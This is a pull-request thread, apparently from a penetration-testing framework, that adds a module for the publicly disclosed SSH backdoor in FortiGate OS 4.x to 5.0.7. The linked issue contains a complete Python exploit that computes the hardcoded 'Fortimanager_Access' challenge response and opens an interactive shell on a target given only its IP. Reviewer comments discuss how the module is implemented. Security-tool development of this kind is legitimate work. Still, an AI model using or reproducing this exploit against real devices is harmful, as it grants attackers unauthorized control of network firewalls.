### PR TITLE
Add Fortinet backdoor

### LINKED ISSUE #6463: [Require] SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
http://seclists.org/fulldisclosure/2016/Jan/26
https://www.reddit.com/r/sysadmin/comments/40jmsr/full_disclosure_ssh_backdoor_for_fortigate_os/
https://www.reddit.com/r/netsec/comments/40lotk/ssh_backdoor_for_fortigate_os_version_4x_up_to/

A picture is [here] (http://i.imgur.com/hEoZEAx.png)
ssh_ fortigate backdoor

```python
#!/usr/bin/env python

# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
# Usage: ./fgt_ssh_backdoor.py <target-ip>

import socket
import select
import sys
import paramiko
from paramiko.py3compat import u
import base64
import hashlib
import termios
import tty

def custom_handler(title, instructions, prompt_list):
    n = prompt_list[0][0]
    m = hashlib.sha1()
    m.update('\x00' * 12)
    m.update(n + 'FGTAbc11*xy+Qqz27')
    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
    return [h]


def main():
    if len(sys.argv) < 2:
        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
        exit(-1)

    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
    except paramiko.ssh_exception.SSHException:
        pass

    trans = client.get_transport()
    try:
        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
    except paramiko.ssh_exception.AuthenticationException:
        pass

    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
    chan = client.invoke_shell()

    oldtty = termios.tcgetattr(sys.stdin)
    try:
        tty.setraw(sys.stdin.fileno())
        tty.setcbreak(sys.stdin.fileno())
        chan.settimeout(0.0)

        while True:
            r, w, e = select.select([chan, sys.stdin], [], [])
            if chan in r:
                try:
                    x = u(chan.recv(1024))
                    if len(x) == 0:
                        sys.stdout.write('\r\n*** EOF\r\n')
                        break
                    sys.stdout.write(x)
                    sys.stdout.flush()
                except socket.timeout:
                    pass
            if sys.stdin in r:
                x = sys.stdin.read(1)
                if len(x) == 0:
                    break
                chan.send(x)

    finally:
        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)


if __name__ == '__main__':
    main()

```

### PR DESCRIPTION
**Pull request by wvu**
WIP. Finishing up module.

Test with `Net::SSH.start(host, 'Fortimanager_Access', auth_methods: ['fortinet-backdoor'], verbose: :debug); nil` in `irb`.

Resolves #6463.

### CODE REVIEW

**Comment by wchen-r7** [comment]
@wvu-r7 Very smart patching from net/ssh. IMO, if the custom_handler method is specific to the Fortinet backdoor, then you might want to consider placing that patch in the module, or in a mixin. lib/net/ssh/authentication/methods feels rather generic.

**Comment by all3g** [comment]
good +1

**Comment by wvu-r7** [comment]
@all3g: Still working that part out. I don't think you can use ```CommandStream```, since that sends an ```exec``` channel request, and we want ```shell```.

**Comment by sempervictus** [comment]
@wvu-r7: neat implementation, though i agree we should try to stay as far away from alterations to net/ssh itself as we can. ideally some day we will not need our own version because we will have proper integration. Any chance we can do something clever like extend the SSH object after creation instead of altering its library?
You can look @ metassh for examples of sessions similar to meterp on ssh, though i wouldn't suggest implementing yet unless you have a clear picture of how - metassh is a bit hacky, though has some clever ideas for dealing with these channelized transports. You might also be running into the receiving end expecting slightly different behavior on session init than the default client provides...

**Comment by wvu-r7** [comment]
\*Sigh\* https://github.com/rapid7/metasploit-framework/issues/6463#issuecomment-172023648

**Comment by wvu-r7** [comment]
Dumped it all in my module. Working as expected. Expect an update on Monday. Thanks.

**Comment by wvu-r7** [comment]
Dumped it all in my module. Working as expected. Will toy with a mixin. Expect an update on Monday. Thanks.

**Comment by wvu-r7** [comment]
Moving this to ```LoginScanner``` is also on the list of things to do.

**Comment by wvu-r7** [comment]
Turns out overriding ```KeyboardInteractive``` is a recipe for disaster. :)

**Comment by wvu-r7** [comment]
Thanks for the merge, @wchen-r7. We'll work on getting a session in another PR.

**Comment by all3g** [comment]
@wvu-r7  Good man !

**Pull request merged**
